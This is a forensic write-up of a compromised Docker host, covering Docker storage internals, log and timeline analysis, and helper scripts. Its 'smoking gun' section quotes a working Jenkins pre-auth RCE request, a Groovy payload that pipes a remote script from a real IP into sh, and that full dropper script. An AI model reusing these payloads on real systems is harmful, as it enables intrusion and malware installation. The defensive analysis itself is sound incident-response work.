Sometimes one goes deep down the rabbit hole, only to notice later that what one was looking for was right under one’s nose.

This is the story of a digital forensic analysis of a Linux system running Docker containers. Our customer was informed by a network provider that one of his systems was actively attacking other systems on the Internet. The system responsible for the attacks was identified and shut down.

Our DFIR hotline responded to the call and we were provided with a disk image to perform a digital forensic analysis.

Prologue

My first step in analyzing the system was to understand what services were exposed to the Internet. I was provided with a list of exposed ports from the firewall:

- TCP 80

- TCP 443

- TCP/UDP 40000-40010

- TCP 8080

I first checked if any special server software was installed on the host:

$ sudo cat mnt_vmdk/var/lib/dpkg/status | grep installed -B1 | grep Package: | cut -c 10- | sort | grep -v ^lib
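The pipeline above relies on each `Package:` line sitting directly above its `Status:` line. A slightly more robust option is to parse the dpkg status file stanza by stanza. The following is a minimal Python sketch under that assumption. The function names are hypothetical, and only packages whose status is exactly `install ok installed` are counted, which is slightly stricter than `grep installed`.

```python
import sys


def parse_dpkg_status(text):
    """Split a dpkg status file into stanzas (blank-line separated) of fields."""
    stanzas = []
    for block in text.strip().split("\n\n"):
        fields = {}
        last_key = None
        for line in block.splitlines():
            if line[:1] in (" ", "\t") and last_key:
                # Continuation line (e.g. a multi-line Description): append to previous field.
                fields[last_key] += "\n" + line.strip()
            elif ":" in line:
                key, _, value = line.partition(":")
                last_key = key.strip()
                fields[last_key] = value.strip()
        if fields:
            stanzas.append(fields)
    return stanzas


def installed_packages(text):
    """Return sorted names of packages whose Status is 'install ok installed'."""
    return sorted(
        s["Package"]
        for s in parse_dpkg_status(text)
        if "Package" in s and s.get("Status") == "install ok installed"
    )


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name): python3 dpkg_installed.py mnt_vmdk/var/lib/dpkg/status
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        for name in installed_packages(fh.read()):
            if not name.startswith("lib"):  # same filter as `grep -v ^lib`
                print(name)
```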

Apart from an FTP and an SSH server, nothing stood out. So I checked whether there had been any suspicious login activity:

# check console logins and reboots
$ sudo utmpdump mnt_vmdk/var/log/wtmp
# auth log
$ sudo cat mnt_vmdk/var/log/auth.log | grep -v CRON
# ftp log
$ sudo cat mnt_vmdk/var/log/vsftpd.log.*

I did not identify anything odd. Hence I assumed everything interesting must have happened inside the Docker Containers.
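A manual review of auth.log can be complemented by counting SSH logins per user and source address, so that brute-force bursts or unexpected successful logins stand out. This is a minimal Python sketch. It assumes the usual OpenSSH message formats (`Accepted ...` / `Failed ... for [invalid user] USER from IP port N`) and ignores every other message type. The function and script names are hypothetical.

```python
import re
import sys
from collections import Counter

# OpenSSH messages as commonly logged by sshd to auth.log, e.g.
# "sshd[123]: Failed password for invalid user admin from 10.0.0.5 port 5555 ssh2".
# Other message types (PAM, disconnects, ...) are deliberately ignored.
SSH_EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[0-9A-Fa-f.:]+) port \d+"
)


def summarize_ssh(lines):
    """Count accepted and failed SSH logins per (user, source IP)."""
    accepted, failed = Counter(), Counter()
    for line in lines:
        m = SSH_EVENT.search(line)
        if m is None:
            continue
        key = (m["user"], m["ip"])
        if m["result"] == "Accepted":
            accepted[key] += 1
        else:
            failed[key] += 1
    return accepted, failed


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name): python3 ssh_summary.py mnt_vmdk/var/log/auth.log
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        ok, bad = summarize_ssh(fh)
    for (user, ip), count in bad.most_common(20):
        print(f"FAILED   {count:5d} {user} from {ip}")
    for (user, ip), count in ok.most_common():
        print(f"ACCEPTED {count:5d} {user} from {ip}")
```

Rotated logs (`auth.log.1`, compressed `.gz` files) would have to be fed in separately.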

A deep dive into Docker

Information Gathering

I quickly realized that all the Containers were shut down. This makes quite a difference in forensic analysis, so this write-up only describes the analysis of stopped Containers.

I used docker-explorer to get information about containers (including stopped ones) and images. Unfortunately, the feature I was most interested in, mounting the filesystem of a stopped container, threw an error on my machine.

$ sudo docker-explorer/bin/python docker-explorer/bin/de.py -r mnt_vmdk/var/lib/docker/ list all_containers

The docker-forensic-toolkit did not recognize stopped containers, but could list installed images. Slowly but steadily, I was able to extract some information.

The tools at hand have their limits, so I had to resort to manual inspection to extract the relevant information. In the Docker world, everything happens under /var/lib/docker. I extracted the relevant Container configs directly from the files:

# structure of the main docker folder
$ sudo ls -l mnt_vmdk/var/lib/docker/
total 32
drwx------ 5 root root 4096 Sep 16 2016 aufs
drwx------ 7 root root 4096 Mär 29 09:43 containers
drwx------ 3 root root 4096 Sep 16 2016 image
drwxr-x--- 3 root root 4096 Sep 16 2016 network
drwx------ 2 root root 4096 Jan 25 2017 swarm
drwx------ 2 root root 4096 Mär 29 09:43 tmp
drwx------ 2 root root 4096 Sep 16 2016 trust
drwx------ 37 root root 4096 Mär 29 09:43 volumes

# here we see that we have 5 containers on the system
$ sudo ls -l mnt_vmdk/var/lib/docker/containers
total 20
[CUT BY COMPASS]
drwx------ 3 root root 4096 Mär 29 10:31 f45ea56fa087b07b5226936b38d45f52e1d2b65c5e863e0e9d7dfe0b681de855

# folder structure of a container
$ sudo ls -l mnt_vmdk/var/lib/docker/containers/f45ea56fa087b07b5226936b38d45f52e1d2b65c5e863e0e9d7dfe0b681de855/
total 44
-rw-rw-rw- 1 root root 4923 Mär 29 10:31 config.v2.json
-rw-r----- 1 root root 10538 Mär 29 10:31 f45ea56fa087b07b5226936b38d45f52e1d2b65c5e863e0e9d7dfe0b681de855-json.log
-rw-rw-rw- 1 root root 1253 Mär 29 10:31 hostconfig.json
-rw-r--r-- 1 root root 8 Mär 29 09:43 hostname
-rw-r--r-- 1 root root 169 Mär 29 09:43 hosts
-rw-r--r-- 1 root root 104 Mär 29 09:43 resolv.conf
-rw-r--r-- 1 root root 71 Mär 29 09:43 resolv.conf.hash
drwx------ 2 root root 4096 Mär 29 09:43 shm

# printing the config of one docker container
$ sudo cat mnt_vmdk/var/lib/docker/containers/f45ea56fa087b07b5226936b38d45f52e1d2b65c5e863e0e9d7dfe0b681de855/config.v2.json | python -mjson.tool
[CUT BY COMPASS]
"ExposedPorts": {
    "50000/tcp": {},
    "8080/tcp": {}
},
"Hostname": "jenkins",
[CUT BY COMPASS]
"Volumes": {
    "/refdata": {},
    "/var/backup/jenkins": {},
    "/var/lib/jenkins": {}
},
[CUT BY COMPASS]
"NetworkSettings": {
    "Bridge": "",
[CUT BY COMPASS]

Using this information, I knew there were 5 containers, and I could also figure out how they interact with each other:

| Image | Description | Exposed ports |
|---|---|---|
| postgresql | Database for Redmine | TCP 5432 |
| pandoc | Wiki | TCP 5001 |
| nginx-proxy | Entry point for public traffic, routing to other containers | TCP 80, 443 |
| jenkins | Build system | TCP 8080, 50000 |
| redmine | Project management software | TCP 80, 443 |
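Collecting this overview by hand from each config.v2.json gets tedious with more containers. Below is a minimal Python sketch that reads every `containers/<id>/config.v2.json` under a mounted Docker root and extracts the fields used above. It assumes the key layout seen in the excerpt (`Config.ExposedPorts`, `Config.Hostname`, `Config.Volumes`) plus `ID`, `Name`, `Config.Image` and `State`, which this file normally contains. Missing keys simply come back empty. The function names are hypothetical.

```python
import json
import sys
from pathlib import Path


def summarize_container(config):
    """Extract overview fields from a parsed config.v2.json dict."""
    cfg = config.get("Config") or {}
    state = config.get("State") or {}
    return {
        "id": config.get("ID", "")[:12],
        "name": config.get("Name", "").lstrip("/"),  # Docker stores names as "/name"
        "image": cfg.get("Image", ""),
        "hostname": cfg.get("Hostname", ""),
        "exposed_ports": sorted((cfg.get("ExposedPorts") or {}).keys()),
        "volumes": sorted((cfg.get("Volumes") or {}).keys()),
        "running": state.get("Running", False),
        "finished_at": state.get("FinishedAt", ""),
    }


def summarize_all(docker_root):
    """Summarize every containers/<id>/config.v2.json below a mounted Docker root."""
    summaries = []
    for path in sorted(Path(docker_root, "containers").glob("*/config.v2.json")):
        with path.open(encoding="utf-8") as fh:
            summaries.append(summarize_container(json.load(fh)))
    return summaries


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name): python3 containers.py mnt_vmdk/var/lib/docker
    for c in summarize_all(sys.argv[1]):
        print(c["id"], c["name"], c["image"], ", ".join(c["exposed_ports"]), c["finished_at"])
```

`State.FinishedAt` is a useful side product: on stopped containers, it shows when each one went down.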

Docker Persistence

Wrong Assumptions

At first, I made some wrong assumptions about Docker persistence. I thought that only the Volumes and Bind Mounts you add are kept when containers are stopped. This is not correct.

As soon as a Container is created from a Docker Image (docker run), a Union Filesystem is created in the corresponding subdirectory of /var/lib/docker. Any data the Container writes is stored in this filesystem. If you stop a Container, the data is still there, and you can start the Container again and continue where you left off. The log file in /var/lib/docker/containers/YOURCONTAINERID/YOURCONTAINERID-json.log is persistent as well.

However, if you delete the Container (docker rm), you lose all its data except the Volumes and Bind Mounts. Unfortunately, this is what happened on the analyzed system, and a lot of potentially interesting data was gone.
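As long as a container has not been removed, its log file is worth reading even on a cold image. The `-json.log` suffix seen in the container folder indicates Docker's default json-file logging driver. This driver writes one JSON object per line, with `log`, `stream` and `time` keys. Below is a minimal Python sketch that assumes this format. The function and script names are hypothetical.

```python
import json
import sys


def parse_json_log(lines):
    """Yield (time, stream, message) tuples from json-file log lines.

    Assumes Docker's json-file format: one object per line with the keys
    "log", "stream" and "time". Lines that are empty or not valid JSON
    (for example a truncated last line) are skipped.
    """
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        yield entry.get("time", ""), entry.get("stream", ""), entry.get("log", "").rstrip("\n")


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage (hypothetical script name):
    # python3 container_log.py mnt_vmdk/var/lib/docker/containers/<id>/<id>-json.log
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        for ts, stream, message in parse_json_log(fh):
            print(ts, stream, message)
```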

Union Filesystems



Union filesystems are basically layers of folders stacked on top of each other, resulting in one merged folder that the Docker Container has mounted. Today, Docker recommends the overlay2 storage driver, which is based on OverlayFS, but the analyzed system was older and used AUFS.

Docker Images are usually built from multiple instructions. For instance, the following Dockerfile deploys a Node.js web app (from Dockerizing a Node.js web app | Node.js (nodejs.org)):

FROM node:16

# Create app directory
WORKDIR /usr/src/app

# Install app dependencies
COPY package*.json ./
RUN npm install
# If you are building your code for production
# RUN npm ci --only=production

# Bundle app source
COPY . .

EXPOSE 8080
CMD [ "node", "server.js" ]

Instructions that change the filesystem (such as RUN, COPY or ADD) each create a new layer, which also becomes a folder in /var/lib/docker/aufs/diff. On top of these, a writable layer is added for the data the Container creates at runtime; it also results in a folder in /var/lib/docker/aufs/diff. The diagram below shows a Docker container based on the ubuntu:latest image:

On a running system, you might find the merged mounts under /var/lib/docker/aufs/mnt/, but because we are doing cold forensics, the mount points are not available. The AUFS layers can be mounted by hand, but this is left to the reader, as we don’t need it for the forensic analysis.


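Even without mounting AUFS, the merged view can be reconstructed file by file. The following Python sketch assumes the AUFS driver layout under /var/lib/docker/aufs:

- `diff/<layer-id>` holds each layer's files.
- `layers/<layer-id>` lists that layer's parents, with the nearest parent first.

A file deleted in an upper layer is hidden by a `.wh.<name>` whiteout entry. The sketch ignores opaque-directory markers (`.wh..wh..opq`). It is meant for locating evidence, not as a faithful AUFS implementation.

On Docker 1.10 and later, the container's top layer ID usually differs from the container ID. It can typically be looked up in `image/aufs/layerdb/mounts/<container-id>/mount-id`; treat that path as an assumption to verify on your image. The function names are hypothetical.

```python
import os


def layer_chain(aufs_root, top_layer):
    """Return layer IDs from the top (container) layer down to the base image layer.

    Assumes aufs/layers/<id> lists the parent layer IDs, nearest parent first.
    """
    with open(os.path.join(aufs_root, "layers", top_layer)) as fh:
        parents = [line.strip() for line in fh if line.strip()]
    return [top_layer] + parents


def resolve(aufs_root, top_layer, rel_path):
    """Return the diff path that provides rel_path in the merged view, or None.

    Simplified: handles .wh.<name> whiteouts of the file and its parent
    directories, but ignores opaque-directory markers (.wh..wh..opq).
    """
    parts = [p for p in rel_path.strip("/").split("/") if p]
    for layer in layer_chain(aufs_root, top_layer):
        diff = os.path.join(aufs_root, "diff", layer)
        candidate = os.path.join(diff, *parts)
        if os.path.lexists(candidate):
            return candidate
        # A whiteout for the file or any parent directory hides all lower layers.
        for i in range(len(parts)):
            whiteout = os.path.join(diff, *parts[:i], ".wh." + parts[i])
            if os.path.lexists(whiteout):
                return None
    return None
```

For example, `resolve("mnt_vmdk/var/lib/docker/aufs", "<layer-id>", "/etc/passwd")` returns the diff path of whichever layer last provided that file, or `None` if the file was deleted or never existed.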

Volumes / Bind Mounts / Tmpfs

Even though the Union filesystem provides persistence, it’s not the recommended way to persist data, because the data is gone as soon as the Container is deleted. Docker recommends using Volumes and Bind Mounts for data that must outlive the Container.

In the end, Volumes are again just folders inside /var/lib/docker/volumes:

# ls -l mnt_vmdk/var/lib/docker/volumes/
total 196
drwxr-xr-x 3 root root 4096 Dez 4 2019 04559dd69b6c58038e9f7f55308dc930adbfe3656d2f66012a02fc413af73940
[CUT BY COMPASS]
-rw------- 1 root root 65536 Mär 29 09:43 metadata.db
drwxr-xr-x 3 root root 4096 Sep 23 2016 ngxpx-data-confd

# ls -l mnt_vmdk/var/lib/docker/volumes/ngxpx-data-confd/
total 8
drwxr-xr-x 2 root root 4096 Mär 29 09:44 _data
---x--x--- 1 root root 4 Sep 23 2016 opts.json

# ls -l mnt_vmdk/var/lib/docker/volumes/ngxpx-data-confd/_data/
total 4
-rw-rw-r-- 1 root root 3151 Mär 29 09:44 default.conf

Bind Mounts, on the other hand, make a file or folder of the host filesystem available inside the Container (somewhat like a soft link to the host), whereas tmpfs mounts live only in memory, so their data is lost once the Container is stopped.
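To know which host paths to examine, the mounts of each container can be read from its config.v2.json. The Python sketch below makes the following assumptions:

- The file contains a `MountPoints` section with keys such as `Destination`, `Source`, `Name`, `RW` and, on newer Docker versions, `Type`.
- The Docker root is /var/lib/docker.
- Volumes use the `local` driver.

When `Type` is absent, the sketch guesses `volume` if a volume name is set and `bind` otherwise; this fallback is a heuristic. Bind-mount sources are host paths, so on a mounted image they still need the image mount prefix (e.g. `mnt_vmdk`). The function names are hypothetical.

```python
import json


def mount_points(config, docker_root="/var/lib/docker"):
    """List a container's mounts from a parsed config.v2.json dict."""
    mounts = []
    for dest, mp in sorted((config.get("MountPoints") or {}).items()):
        name = mp.get("Name", "")
        # Older Docker versions may not record "Type"; fall back to a heuristic.
        kind = mp.get("Type") or ("volume" if name else "bind")
        if kind == "volume":
            # Data of a local volume lives in volumes/<name>/_data.
            host_path = f"{docker_root}/volumes/{name}/_data"
        elif kind == "bind":
            host_path = mp.get("Source", "")
        else:
            host_path = ""  # e.g. tmpfs: nothing on disk
        mounts.append({
            "destination": mp.get("Destination", dest),
            "type": kind,
            "volume_name": name,
            "host_path": host_path,
            "read_write": mp.get("RW", True),
        })
    return mounts


def load_mounts(config_path, docker_root="/var/lib/docker"):
    """Read a config.v2.json file and list its mounts."""
    with open(config_path, encoding="utf-8") as fh:
        return mount_points(json.load(fh), docker_root)
```

Under these assumptions, a container using the `ngxpx-data-confd` volume from the listing above would map it to `/var/lib/docker/volumes/ngxpx-data-confd/_data`.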

Analyzing the data

All data inside the Containers is transparently available to the host. It is mostly just scattered across those layer folders in /var/lib/docker, although Bind Mounts may also point outside the Docker folder. This makes it possible to search /var/lib/docker for interesting files:

# find mnt_vmdk/var/lib/docker/ -mtime -10 -exec ls -ld '{}' ';' | grep -v "Mär 29"

It also allows filesystem timeline analysis:

$ sudo fls -o 63 -m / -r /media/Data/ubuntu.vmdk > body.txt
$ mactime -b body.txt -d -y > timeline.csv
# searching for interesting data
$ grep "/var/lib/docker" timeline.csv | grep 2021-03-23

This worked quite well but, unfortunately, showed no interesting results on the analyzed system.
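One caveat with `find -mtime -10`: the ten days are counted back from the moment the command runs. On a cold image, the result therefore depends on the analysis date rather than on the incident. Below is a minimal Python sketch with an explicit time window instead. The function name and the example window are assumptions. Pass timezone-aware datetimes, since naive ones are interpreted in local time.

```python
import os
from datetime import datetime, timezone


def modified_between(root, start, end):
    """Yield (mtime, path) for entries under root modified in [start, end).

    The window is explicit, so results do not depend on the date the
    analysis is run. Symlinks are not followed (os.walk default, lstat).
    """
    lo, hi = start.timestamp(), end.timestamp()
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.lstat(path).st_mtime
            except OSError:
                continue
            if lo <= mtime < hi:
                yield datetime.fromtimestamp(mtime, timezone.utc), path
```

For example, `modified_between("mnt_vmdk/var/lib/docker", datetime(2021, 3, 19, tzinfo=timezone.utc), datetime(2021, 3, 29, tzinfo=timezone.utc))` covers ten days and leaves out the shutdown day, similar to the `grep -v "Mär 29"` filter above.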

Let there be logs

While going down the rabbit hole with Docker, I almost missed the obvious. When I checked the timeline in Plaso, syslog entries from NGINX caught my attention.

It seemed that the Docker orchestration software in use forwarded the NGINX container logs to the host’s syslog. This was extremely valuable, as all potentially dangerous requests to all applications were recorded.
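Once the forwarded NGINX entries are found, the request lines can be pulled out of the syslog with a regular expression. The Python sketch below assumes NGINX's default `combined` log format for the part after the syslog prefix (request, status, size, referer, user agent). The syslog prefix itself is not parsed. Because the pattern is applied with `finditer`, it also finds several entries that ended up on one line. The function and script names are hypothetical.

```python
import re
import sys

# Request part of NGINX's default "combined" log format:
# "METHOD PATH PROTOCOL" STATUS BYTES "REFERER" "USER-AGENT"
# The syslog prefix and the client address before it are not parsed.
REQUEST = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def find_requests(lines, needle):
    """Yield (status, path, user_agent) for logged requests whose path contains needle."""
    for line in lines:
        # finditer also catches several entries that ended up on one line.
        for m in REQUEST.finditer(line):
            if needle in m["path"]:
                yield int(m["status"]), m["path"], m["agent"]


if __name__ == "__main__" and len(sys.argv) > 2:
    # Usage (hypothetical script name): python3 find_requests.py mnt_vmdk/var/log/syslog checkScript
    with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
        for status, path, agent in find_requests(fh, sys.argv[2]):
            print(status, path[:120], agent)
```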

The smoking gun

After some unsuccessful brute-force attacks on Jenkins, the attacker sent the following GET requests to exploit a pre-auth RCE (described here). The payload even sets its download user agent to cve_2018_1000861:

"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public+class+x+%7B%0A%09%09public+x%28%29%7B%0A%09%09def+c%3D%5B%27sh%27%2C%27-c%27%2C%27%28curl+--user-agent+cve_2018_1000861+http%3A%2F%2F194.145.227.21%2Fldr.sh+%7C%7C+wget+--user-agent+cve_2018_1000861+-q+-O+-+http%3A%2F%2F194.145.227.21%2Fldr.sh%29+%7C+sh%27%5D%3Bc.execute%28%29%0A%09%09%7D%0A%09%7D HTTP/1.1" 404 1875 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"

"GET /jenkins/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public+class+x+%7B%0A%09%09public+x%28%29%7B%0A%09%09def+c%3D%5B%27sh%27%2C%27-c%27%2C%27%28curl+--user-agent+cve_2018_1000861+http%3A%2F%2F194.145.227.21%2Fldr.sh+%7C%7C+wget+--user-agent+cve_2018_1000861+-q+-O+-+http%3A%2F%2F194.145.227.21%2Fldr.sh%29+%7C+sh%27%5D%3Bc.execute%28%29%0A%09%09%7D%0A%09%7D HTTP/1.1" 200 16 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"

Note that the first try failed with status 404 because the path was incorrect: it lacked the /jenkins prefix. The second try worked, as the server returned status 200. Here is the decoded content of the malicious Groovy script:

public class x {
    public x(){
        def c=['sh','-c','(curl --user-agent cve_2018_1000861 http://[IP]/ldr.sh || wget --user-agent cve_2018_1000861 -q -O - http://[IP]/ldr.sh) | sh'];
        c.execute()
    }
}
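The Groovy script above can be recovered from the logged request with Python's standard library. `urllib.parse.parse_qs` splits the query string and undoes both the `%XX` escapes and the `+`-for-space encoding. Below is a minimal sketch; the function name is hypothetical. The test path below uses a harmless `id` command in place of the real downloader.

```python
from urllib.parse import parse_qs, urlsplit


def extract_param(request_path, name="value"):
    """Return the URL-decoded query parameter `name` from a logged request path, or None."""
    values = parse_qs(urlsplit(request_path).query).get(name)
    return values[0] if values else None
```

Applied to the path of the second logged request, it returns the Groovy class shown above, including the original tabs and newlines, with the real IP address in place of `[IP]`.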

The Groovy script basically loads a shell script from an IP address located in Ukraine and executes it. The shell script was still online and could be downloaded:

cc=http://[IP]
sys=$(cat /dev/urandom | head -n 9 | md5sum | head -c $(seq 6 12 | sort -R | head -n1))

get() {
    chattr -i $2; rm -rf $2; curl $1 > $2 || wget -q -O - $1 > $2; chmod +x $2
}

[ $(getconf LONG_BIT) = 32 ] && exit

cd /tmp || cd /mnt || cd /root || cd /

pkill -9 solr.sh
pkill -9 solrd
ps aux | grep kthreaddi | grep tmp | awk '{print $2}' | xargs -I % kill -9 %
ps aux | egrep "network0[0-1]|srv00[1-9]|srv01[0-2]" | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep sysrv | grep -v 0 | awk '{print $2}' | xargs -I % kill -9 %

test -x "$(command -v crontab)" || {
    if [ $(id -u) -eq 0 ]; then
        apt-get update -y
        apt-get -y install cron
        service cron start
        yum update -y
        yum -y install crontabs
        service crond start
    fi
}

netstat -anp | grep ':52018\|:52019' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %

get $cc/sysrv $sys; ./$sys
ls -al | grep -v $sys | xargs rm -rf



This script downloads another file from that IP, stores it locally, executes and deletes it. The file was also still online and could be downloaded. This time it was an ELF binary packed with UPX, probably the C&C software:

$ file malware/malware*
malware/malware: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
malware/malware-unpacked: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=O33tfzE3BuYUMWlm2ZsA/lnzgr39BnKpPpTXUdLkv/Hh-bqZSb70SeeUNNGohZ/Hgm8yzWdCDKScwMqSKek, stripped

$ md5sum malware/malware*
ffc7913d81c9fe83bd1af2eb9ff3ef51 malware/malware
261fad6984063df0e32b83d6fd874cfd malware/malware-unpacked

$ sha256sum malware/malware*
9d804c3f6f56aa6aa9c7d1a1492a57d8d7604bdc694682fba996ab5492f52479 malware/malware
5b3f37c6ec006377faa2984d12fb2ef0d65548c6c2667cc7d23701bf6a731d74 malware/malware-unpacked

VirusTotal shows that these artifacts are malicious.
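When many samples need to be documented, the same hashes can be computed in Python. The sketch below reads files in chunks with `hashlib`. The UPX check is only a heuristic: it looks for the `UPX!` marker that UPX normally leaves in packed files, and this marker can be removed by tampering. Actual unpacking is usually done with `upx -d`. The function names are hypothetical.

```python
import hashlib


def file_digests(path, chunk_size=1 << 20):
    """Compute MD5 and SHA-256 of a file in chunks (suitable for large samples)."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return {"md5": md5.hexdigest(), "sha256": sha256.hexdigest()}


def looks_upx_packed(path):
    """Heuristic: an ELF file that contains the 'UPX!' marker written by UPX."""
    with open(path, "rb") as fh:
        data = fh.read()
    return data[:4] == b"\x7fELF" and b"UPX!" in data
```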

Takeaways

Diving into Docker was very interesting. First and foremost, update your Docker Containers and Images regularly!

Due to the limited number of artifacts on Linux, it’s very important to increase application and system logging or to install a host intrusion detection tool (auditd or Falco, for instance).

As Docker Containers may be deleted quite frequently by operators and deployment pipelines, it is important that logs are forwarded and persisted over a long period of time.

Finally, when collecting forensic evidence, don’t shut down Docker containers. Prefer suspending the VM and securing the VMEM and VMDK files for analysis.
